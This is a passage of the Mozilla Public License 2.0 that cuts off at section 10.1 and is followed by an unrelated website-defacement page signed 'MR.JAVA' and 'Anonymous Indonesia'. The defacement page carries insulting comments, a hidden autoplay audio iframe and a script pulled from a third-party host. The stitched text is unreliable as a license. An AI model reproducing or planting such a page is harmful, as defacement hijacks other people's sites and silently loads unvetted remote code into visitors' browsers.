its
Contributions are its original creation(s) or it has sufficient rights
to grant the rights to its Contributions conveyed by this License.

2.6. Fair Use

This License is not intended to limit any rights You have under
applicable copyright doctrines of fair use, fair dealing, or other
equivalents.

2.7. Conditions

Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted
in Section 2.1.

3. Responsibilities
-------------------

3.1. Distribution of Source Form

All distribution of Covered Software in Source Code Form, including any
Modifications that You create or to which You contribute, must be under
the terms of this License. You must inform recipients that the Source
Code Form of the Covered Software is governed by the terms of this
License, and how they can obtain a copy of this License. You may not
attempt to alter or restrict the recipients' rights in the Source Code
Form.

3.2. Distribution of Executable Form

If You distribute Covered Software in Executable Form then:

(a) such Covered Software must also be made available in Source Code
    Form, as described in Section 3.1, and You must inform recipients of
    the Executable Form how they can obtain a copy of such Source Code
    Form by reasonable means in a timely manner, at a charge no more
    than the cost of distribution to the recipient; and

(b) You may distribute such Executable Form under the terms of this
    License, or sublicense it under different terms, provided that the
    license for the Executable Form does not attempt to limit or alter
    the recipients' rights in the Source Code Form under this License.

3.3. Distribution of a Larger Work

You may create and distribute a Larger Work under terms of Your choice,
provided that You also comply with the requirements of this License for
the Covered Software. If the Larger Work is a combination of Covered
Software with a work governed by one or more Secondary Licenses, and the
Covered Software is not Incompatible With Secondary Licenses, this
License permits You to additionally distribute such Covered Software
under the terms of such Secondary License(s), so that the recipient of
the Larger Work may, at their option, further distribute the Covered
Software under the terms of either this License or such Secondary
License(s).

3.4. Notices

You may not remove or alter the substance of any license notices
(including copyright notices, patent notices, disclaimers of warranty,
or limitations of liability) contained within the Source Code Form of
the Covered Software, except that You may alter any license notices to
the extent required to remedy known factual inaccuracies.

3.5. Application of Additional Terms

You may choose to offer, and to charge a fee for, warranty, support,
indemnity or liability obligations to one or more recipients of Covered
Software. However, You may do so only on Your own behalf, and not on
behalf of any Contributor. You must make it absolutely clear that any
such warranty, support, indemnity, or liability obligation is offered by
You alone, and You hereby agree to indemnify every Contributor for any
liability incurred by such Contributor as a result of warranty, support,
indemnity or liability terms You offer. You may include additional
disclaimers of warranty and limitations of liability specific to any
jurisdiction.

4. Inability to Comply Due to Statute or Regulation
---------------------------------------------------

If it is impossible for You to comply with any of the terms of this
License with respect to some or all of the Covered Software due to
statute, judicial order, or regulation then You must: (a) comply with
the terms of this License to the maximum extent possible; and (b)
describe the limitations and the code they affect. Such description must
be placed in a text file included with all distributions of the Covered
Software under this License. Except to the extent prohibited by statute
or regulation, such description must be sufficiently detailed for a
recipient of ordinary skill to be able to understand it.

5. Termination
--------------

5.1. The rights granted under this License will terminate automatically
if You fail to comply with any of its terms. However, if You become
compliant, then the rights granted under this License from a particular
Contributor are reinstated (a) provisionally, unless and until such
Contributor explicitly and finally terminates Your grants, and (b) on an
ongoing basis, if such Contributor fails to notify You of the
non-compliance by some reasonable means prior to 60 days after You have
come back into compliance. Moreover, Your grants from a particular
Contributor are reinstated on an ongoing basis if such Contributor
notifies You of the non-compliance by some reasonable means, this is the
first time You have received notice of non-compliance with this License
from such Contributor, and You become compliant prior to 30 days after
Your receipt of the notice.

5.2. If You initiate litigation against any entity by asserting a patent
infringement claim (excluding declaratory judgment actions,
counter-claims, and cross-claims) alleging that a Contributor Version
directly or indirectly infringes any patent, then the rights granted to
You by any and all Contributors for the Covered Software under Section
2.1 of this License shall terminate.

5.3. In the event of termination under Sections 5.1 or 5.2 above, all
end user license agreements (excluding distributors and resellers) which
have been validly granted by You or Your distributors under this License
prior to termination shall survive termination.

************************************************************************
*                                                                      *
*  6. Disclaimer of Warranty                                           *
*  -------------------------                                           *
*                                                                      *
*  Covered Software is provided under this License on an "as is"       *
*  basis, without warranty of any kind, either expressed, implied, or  *
*  statutory, including, without limitation, warranties that the       *
*  Covered Software is free of defects, merchantable, fit for a        *
*  particular purpose or non-infringing. The entire risk as to the     *
*  quality and performance of the Covered Software is with You.        *
*  Should any Covered Software prove defective in any respect, You     *
*  (not any Contributor) assume the cost of any necessary servicing,   *
*  repair, or correction. This disclaimer of warranty constitutes an   *
*  essential part of this License. No use of any Covered Software is   *
*  authorized under this License except under this disclaimer.         *
*                                                                      *
************************************************************************

************************************************************************
*                                                                      *
*  7. Limitation of Liability                                          *
*  --------------------------                                          *
*                                                                      *
*  Under no circumstances and under no legal theory, whether tort      *
*  (including negligence), contract, or otherwise, shall any           *
*  Contributor, or anyone who distributes Covered Software as          *
*  permitted above, be liable to You for any direct, indirect,         *
*  special, incidental, or consequential damages of any character      *
*  including, without limitation, damages for lost profits, loss of    *
*  goodwill, work stoppage, computer failure or malfunction, or any    *
*  and all other commercial damages or losses, even if such party      *
*  shall have been informed of the possibility of such damages. This   *
*  limitation of liability shall not apply to liability for death or   *
*  personal injury resulting from such party's negligence to the       *
*  extent applicable law prohibits such limitation. Some               *
*  jurisdictions do not allow the exclusion or limitation of           *
*  incidental or consequential damages, so this exclusion and          *
*  limitation may not apply to You.                                    *
*                                                                      *
************************************************************************

8. Litigation
-------------

Any litigation relating to this License may be brought only in the
courts of a jurisdiction where the defendant maintains its principal
place of business and such litigation shall be governed by laws of that
jurisdiction, without reference to its conflict-of-law provisions.
Nothing in this Section shall prevent a party's ability to bring
cross-claims or counter-claims.

9. Miscellaneous
----------------

This License represents the complete agreement concerning the subject
matter hereof. If any provision of this License is held to be
unenforceable, such provision shall be reformed only to the extent
necessary to make it enforceable. Any law or regulation which provides
that the language of a contract shall be construed against the drafter
shall not be used to construe this License against a Contributor.

10. Versions of the License
---------------------------

10.1. New Versions


<!DOCTYPE HTML> <!-- Hey, Fuck You! :) -->
 <html> 
<head> <!-- Contact: shadow@gmail.com -->
<title>ADMIN GANTENG</title>
<span style="visibility: hidden"><iframe widllth="0%" height="0" scrolling="no" frameborder="no" loop="true" allow="autoplay" src="https://f.top4top.net/m_1030050ww0.mp3"></iframe></span>
<meta name="description" content="Stupid Attacker :)"> 	<link href="https://fonts.googleapis.com/css?family=Mirza" rel="StyleSheet" type="text/css"> <link rel="shortcut icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcTOL7j5z5VogQAz_FlJ5f8yP4MyiqKmdr4rYqDNYvAdIFbCEK8s" type="image/png"> <meta property="og:image" content="https://www.upload.ee/image/9107478/IMG-20181024-WA0029.jpg"></head> <style type="text/css"> 	body { 		background-color: Black; 		align: center; } .kontol { 	font-family: Mirza; 	font-size: 45px; 	color: white; 	text-align: center; } red{ 	color: red; } .pulseit{display:inline-block;-webkit-animation:pound .7s infinite;animation:pound .9s infinite;} @keyframes pound {from {transform:none;}90% {transform:scale(1.4);}to {transform:none;}} </style> <body> <center> <br><br><img src="https://i.pinimg.com/originals/49/d8/14/49d814a73b9579565ea40affa7d9edec.png"widht="650" height="650"></img></center><center> <p align="center"> <font class="pulseit" style="font-family: Mirza; font-size: 45px; color: White; text-align: center;">[<red>!</red>] <blue>MR.JAVA</blue> [<red>!</red>]</font> <br><font><br><font color="red" size="5"> <marquee direction="left" scrollamount="300" align="center" color="red">=============================================================</marquee><font class="kontol"></font> <font size="5" font face="Courgette" color="Green">Berusaha dengan sangat keras lagi, dan jika gagal, coba lagi. Sampai pada akhirnya kamu menemui kesuksesanmu..terkadang, apa yang kita bayangkan tidak selalu menjadi kenyataan, tapi Impian harus dicapai melalui sebuah usaha dan kerja keras<red><br><marquee direction="right" scrollamount="300" align="center"color="red">=============================================================
</marquee> <red>[</red>MR.JAVA is here<red>]</red><br><marquee style="font-family: Mirza; color: white; font-size: 45px;" behavior="alternate" scrollamount="20" scrolldelay="1" width="80%" size="4"></red><red>|</red>DEVELOPER<red>|</marquee>
<a href="http://www.gambaranimasi.org/cat-horor-84.htm"><img src="http://www.gambaranimasi.org/data/media/84/animasi-bergerak-horor-mengerikan-0079.gif" border="0" alt="animasi-bergerak-horor-mengerikan-0079" /></a> <script src='http://yudhaime.jw.lt/files/sakura.js'></script>
 </body> 
</html>
 <!-- Anonymous Indonesia -->




